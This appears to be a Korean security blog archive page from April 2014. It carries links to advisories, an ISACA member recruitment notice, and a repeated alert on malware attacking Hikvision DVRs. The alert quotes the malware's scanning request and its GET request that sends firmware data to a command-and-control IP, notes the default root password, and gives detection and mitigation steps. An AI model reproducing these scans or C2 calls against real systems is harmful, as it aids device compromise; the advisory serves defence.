OLE 파일 구조 : 기초 (동영상 포함)
http://www.nurilab.com/?p=577
2014년 4월 7일 월요일
2014년 4월 6일 일요일
CONCERT, Weekly News Tracking & Commentary April.2014 Vol86
CONCERT, Weekly News Tracking & Commentary April.2014 Vol86
http://concert.or.kr/newsletter/vol_86_weekly.html
http://concert.or.kr/newsletter/vol_86_weekly.html
제7기 ISACA 지식 연구회원 모집 안내
< 제7기 ISACA 지식 연구회원 모집 안내 >
안녕하십니까?
ISACA는 감사, 통제, 보안, 거버넌스라는 4대 영역에 걸쳐 국제표준기구에 준하는 국제적 리더십을 발휘해오고 있으며, 이 4대 분야의 지식을 국제적(global), 가치중립적(neutral), 실무적(practical)인 내용으로 지속 생산해서 전세계 160개국 100,000 여명의 ISACA 회원들에게 꾸준히 공급해 오고 있습니다.
이런 ISACA지식을 감사, 통제, 보안, 거버넌스 및 관련 IT분야에 종사하는 실무자들이 직접 연구하고 실무지식으로 소화하며 우리 사회에 널리 알리는 일은 이 분야의 전문가가 되는 길이자 해나가야 할 일일 것입니다.
이에 우리 협회에서는 열정과 의지를 가지고 ISACA 지식을 연구할 회원을 아래와 같이 제7기 연구회원으로 모집합니다.
ISACA프레임워크에 대한 연구활동을 통해 전문가로 발돋움하며, 우리 협회의 국내외 활동에 입문할 수 있는 소중한 기회가 될 줄 압니다.
많은 신청 바랍니다.
감사합니다.
모집회원: 제7기 2014년 ISACA 지식 연구회원
모집 인원: 00명
모집 기간: 2014년 4월 18일(금) 까지
신청 자격:
- ISACA 회원
- COBIT 등 ISACA지식에 관심이 있어 실무에 활용하고자 하는 분
(자격증 보유 불문)
- CISA 자격증을 독학으로 준비하는 분
- 영문 매뉴얼 정도를 독해가 가능한 분
- 여의도 정기모임에 참석할 수 있는 분
연구활동(안):
- 주요 프레임워크를 참고하여 실무력 향상에 노력
- 활동성과를 우리 분야 사람들과 공유
기타:
- 선정 대상자에게는 개별 통지 예정
- 4월 중 오리엔테이션 실시 예정
- 활동기간 : 2014년 4월 ~ 2015년 1월 (약 8개월)
문의처 및 제출처:
- 전화 : 02-2026-3820
- 이메일 : isacak@isaca.or.kr
- 신청서 : https://www.facebook.com/download/623231651101221/ISACA%207%EA%B8%B0_application.doc
안녕하십니까?
ISACA는 감사, 통제, 보안, 거버넌스라는 4대 영역에 걸쳐 국제표준기구에 준하는 국제적 리더십을 발휘해오고 있으며, 이 4대 분야의 지식을 국제적(global), 가치중립적(neutral), 실무적(practical)인 내용으로 지속 생산해서 전세계 160개국 100,000 여명의 ISACA 회원들에게 꾸준히 공급해 오고 있습니다.
이런 ISACA지식을 감사, 통제, 보안, 거버넌스 및 관련 IT분야에 종사하는 실무자들이 직접 연구하고 실무지식으로 소화하며 우리 사회에 널리 알리는 일은 이 분야의 전문가가 되는 길이자 해나가야 할 일일 것입니다.
이에 우리 협회에서는 열정과 의지를 가지고 ISACA 지식을 연구할 회원을 아래와 같이 제7기 연구회원으로 모집합니다.
ISACA프레임워크에 대한 연구활동을 통해 전문가로 발돋움하며, 우리 협회의 국내외 활동에 입문할 수 있는 소중한 기회가 될 줄 압니다.
많은 신청 바랍니다.
감사합니다.
모집회원: 제7기 2014년 ISACA 지식 연구회원
모집 인원: 00명
모집 기간: 2014년 4월 18일(금) 까지
신청 자격:
- ISACA 회원
- COBIT 등 ISACA지식에 관심이 있어 실무에 활용하고자 하는 분
(자격증 보유 불문)
- CISA 자격증을 독학으로 준비하는 분
- 영문 매뉴얼 정도를 독해가 가능한 분
- 여의도 정기모임에 참석할 수 있는 분
연구활동(안):
- 주요 프레임워크를 참고하여 실무력 향상에 노력
- 활동성과를 우리 분야 사람들과 공유
기타:
- 선정 대상자에게는 개별 통지 예정
- 4월 중 오리엔테이션 실시 예정
- 활동기간 : 2014년 4월 ~ 2015년 1월 (약 8개월)
문의처 및 제출처:
- 전화 : 02-2026-3820
- 이메일 : isacak@isaca.or.kr
- 신청서 : https://www.facebook.com/download/623231651101221/ISACA%207%EA%B8%B0_application.doc
2014년 4월 2일 수요일
Security Vulnerabilities in Oracle Java Cloud Service
Security Vulnerabilities in Oracle Java Cloud Service
http://www.security-explorations.com/en/SE-2013-01-details.html
http://www.security-explorations.com/en/SE-2013-01-details.html
2014년 4월 1일 화요일
Cisco 제품군 다중 취약점 보안 업데이트 권고
Cisco 제품군 다중 취약점 보안 업데이트 권고
http://www.krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=20804
http://www.krcert.or.kr/kor/data/secNoticeView.jsp?p_bulletin_writing_sequence=20804
[SecurityPlus Alert] 5000번 포트스캐닝 - Hikvision DVR 시스템 노린 악성코드 주의
[SecurityPlus Alert] 5000번 포트스캐닝 - Hikvision DVR 시스템 노린 악성코드 주의
1. 분석 보고
- 리눅스 시스템 기반 Hikvision DVR 시스템에 대해 공격하는 악성코드로 해당 악성코드에 침해당한 시스템 상의 /dev/cmd.so에 위치.
- 공격 받은 취약한 Hikvision DVR 시스템의 경우, 외부로 telnet 포트가 오픈되어 있으며, 기본 Root 패스워드(12345) 사용.
- 악성코드는 ARM binary로 되어 있으며, Synology 디바이스를 찾기 위해 다음과 같은 5000번 포트 스캐닝 수행.
GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
- 포트 스캔 결과 응답이 있으면 firmware 정보를 다음과 같이 162.219.57.8로 전송
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
- 위와 같이 포트 스캐닝을 통해 취약한 디바이스 탐지 후, 공격 수행.
2. 대응 조치
- 사용 Hikvision DVR에 대해 피해 여부 확인
(1) /dev/cmd.so 파일 존재 여부 확인
(2) 162.219.57.8 접속 로그 확인
(3) /webman/info.cgi?host, /k.php?h=%lu 웹 로그 존재 여부 확인
- 만일 아직 피해를 입지 않았다면,
(1) 취약하지 않은 버젼으로 Firmware 및 관련 소프트웨어 업그레이드
(2) 기본 Root 패스워드 변경
(3) 불필요하게 외부 오픈된 Telnet 혹은 SSH 포트 차단
1. 분석 보고
- 리눅스 시스템 기반 Hikvision DVR 시스템에 대해 공격하는 악성코드로 해당 악성코드에 침해당한 시스템 상의 /dev/cmd.so에 위치.
- 공격 받은 취약한 Hikvision DVR 시스템의 경우, 외부로 telnet 포트가 오픈되어 있으며, 기본 Root 패스워드(12345) 사용.
- 악성코드는 ARM binary로 되어 있으며, Synology 디바이스를 찾기 위해 다음과 같은 5000번 포트 스캐닝 수행.
GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
- 포트 스캔 결과 응답이 있으면 firmware 정보를 다음과 같이 162.219.57.8로 전송
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
- 위와 같이 포트 스캐닝을 통해 취약한 디바이스 탐지 후, 공격 수행.
2. 대응 조치
- 사용 Hikvision DVR에 대해 피해 여부 확인
(1) /dev/cmd.so 파일 존재 여부 확인
(2) 162.219.57.8 접속 로그 확인
(3) /webman/info.cgi?host, /k.php?h=%lu 웹 로그 존재 여부 확인
- 만일 아직 피해를 입지 않았다면,
(1) 취약하지 않은 버젼으로 Firmware 및 관련 소프트웨어 업그레이드
(2) 기본 Root 패스워드 변경
(3) 불필요하게 외부 오픈된 Telnet 혹은 SSH 포트 차단
피드 구독하기:
글 (Atom)